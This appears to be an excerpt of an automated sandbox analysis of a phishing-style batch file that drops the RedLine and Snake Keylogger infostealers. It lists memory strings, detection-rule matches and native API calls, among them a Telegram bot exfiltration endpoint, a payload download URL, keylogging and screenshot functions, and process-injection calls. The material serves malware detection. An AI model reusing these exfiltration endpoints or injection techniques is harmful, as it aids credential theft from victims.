00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif.4.drString found in binary or memory: http://ocsp.comodoca.com0$
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                            Source: powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                            Source: powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2191894741.0000000004C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                            Source: x.exe, 00000004.00000003.2058015103.00000000218ED000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2016123809.000000007F370000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000000.2012623457.0000000000401000.00000020.00000001.01000000.00000004.sdmp, rpkhzpuO.pif, 00000007.00000002.2099220238.0000000000C40000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2099220238.0000000001220000.00000040.00000400.00020000.00000000.sdmp, PO#5_Tower_049.bat, Oupzhkpr.PIF.4.dr, x.exe.2.drString found in binary or memory: http://team-x.ru/
                            Source: powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062232387.000000007ECEA000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.000000002069D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2098429794.00000000218E0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif.4.drString found in binary or memory: http://www.pmail.com0
                            Source: powershell.exe, 0000000A.00000002.2191894741.0000000004C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                            Source: rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                            Source: powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                            Source: powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                            Source: powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                            Source: powershell.exe, 0000000A.00000002.2191894741.0000000004D88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                            Source: x.exe, 00000004.00000002.2065211434.000000000054E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/
                            Source: x.exe, 00000004.00000002.2084775206.000000002070D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200
                            Source: x.exe, 00000004.00000002.2065211434.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com/wps/200_Oupzhkprnvw
                            Source: x.exe, 00000004.00000002.2065211434.00000000005C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lwaziacademy.com:443/wps/200_OupzhkprnvwB
                            Source: powershell.exe, 0000000A.00000002.2239304902.0000000005C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                            Source: Microsofts.exe, 00000009.00000002.3264032203.00000000012F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/
                            Source: rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                            Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.1d
                            Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                            Source: unknownHTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.5:49705 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Source: Microsofts.exe.7.dr, UltraSpeed.cs.Net Code: TakeScreenshot
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, UltraSpeed.cs.Net Code: TakeScreenshot
                            Source: Microsofts.exe.7.dr, UltraSpeed.cs.Net Code: VKCodeToUnicode
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                            Source: Yara matchFile source: Process Memory Space: x.exe PID: 2788, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTR

                            System Summary

                            barindex
                            Source: 7.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 7.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 23.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: 23.1.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: 7.2.rpkhzpuO.pif.26b351f0.10.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 18.1.rpkhzpuO.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: 9.0.Microsofts.exe.b70000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 23.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: 7.2.rpkhzpuO.pif.26b4d410.14.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 7.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 18.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 18.2.rpkhzpuO.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: 7.2.rpkhzpuO.pif.26b4d410.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 23.2.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 18.1.rpkhzpuO.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 7.1.rpkhzpuO.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: 00000012.00000001.2160139244.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000012.00000002.2270156460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000017.00000001.2249245726.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000017.00000002.2359070635.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: Process Memory Space: rpkhzpuO.pif PID: 6480, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: Process Memory Space: Microsofts.exe PID: 6004, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPEDMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                            Source: Trading_AIBot.exe.7.dr, cfRDgxIJtEfCD.csLong String: Length: 17605
                            Source: 7.2.rpkhzpuO.pif.25b4a208.7.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                            Source: 7.2.rpkhzpuO.pif.25b5b664.8.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                            Source: 7.2.rpkhzpuO.pif.25b38dc4.9.raw.unpack, cfRDgxIJtEfCD.csLong String: Length: 17605
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile dump: apihost.exe.8.dr 665670656Jump to dropped file
                            Source: PO#5_Tower_049.batStatic file information: 1243067
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D8254 NtReadVirtualMemory,4_2_027D8254
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D84C4 NtUnmapViewOfSection,4_2_027D84C4
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027DDA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,4_2_027DDA44
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027DDACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,4_2_027DDACC
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027DDBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,4_2_027DDBB0
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D8BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_027D8BB0
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D79B4 NtAllocateVirtualMemory,4_2_027D79B4
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D7D00 NtWriteVirtualMemory,4_2_027D7D00
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D8BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,4_2_027D8BAE
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027DD9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,4_2_027DD9F0
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D79B2 NtAllocateVirtualMemory,4_2_027D79B2
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_02848254 NtReadVirtualMemory,14_2_02848254
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_028484C4 NtUnmapViewOfSection,14_2_028484C4
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_0284DACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,14_2_0284DACC
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_0284DA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,14_2_0284DA44
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_02848BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,14_2_02848BB0
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_0284DBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,14_2_0284DBB0
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_028479B4 NtAllocateVirtualMemory,14_2_028479B4
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_02847D00 NtWriteVirtualMemory,14_2_02847D00
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_02848BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,14_2_02848BAE
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_028479B2 NtAllocateVirtualMemory,14_2_028479B2
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 14_2_0284D9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,14_2_0284D9F0
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_02818254 NtReadVirtualMemory,20_2_02818254
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_028184C4 NtUnmapViewOfSection,20_2_028184C4
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_0281DACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,20_2_0281DACC
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_0281DA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,20_2_0281DA44
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_02818BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,20_2_02818BB0
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_0281DBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose,20_2_0281DBB0
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_028179B4 NtAllocateVirtualMemory,20_2_028179B4
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_02817D00 NtWriteVirtualMemory,20_2_02817D00
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_02818BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,20_2_02818BAE
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_028179B2 NtAllocateVirtualMemory,20_2_028179B2
                            Source: C:\Users\Public\Libraries\Oupzhkpr.PIFCode function: 20_2_0281D9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,20_2_0281D9F0
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027D85DC CreateProcessAsUserW,4_2_027D85DC
                            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_027C20C44_2_027C20C4
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_00408C607_2_00408C60
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_0040DC117_2_0040DC11
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_00407C3F7_2_00407C3F
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_00418CCC7_2_00418CCC
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifCode function: 7_2_00406CA07_2_00406CA0
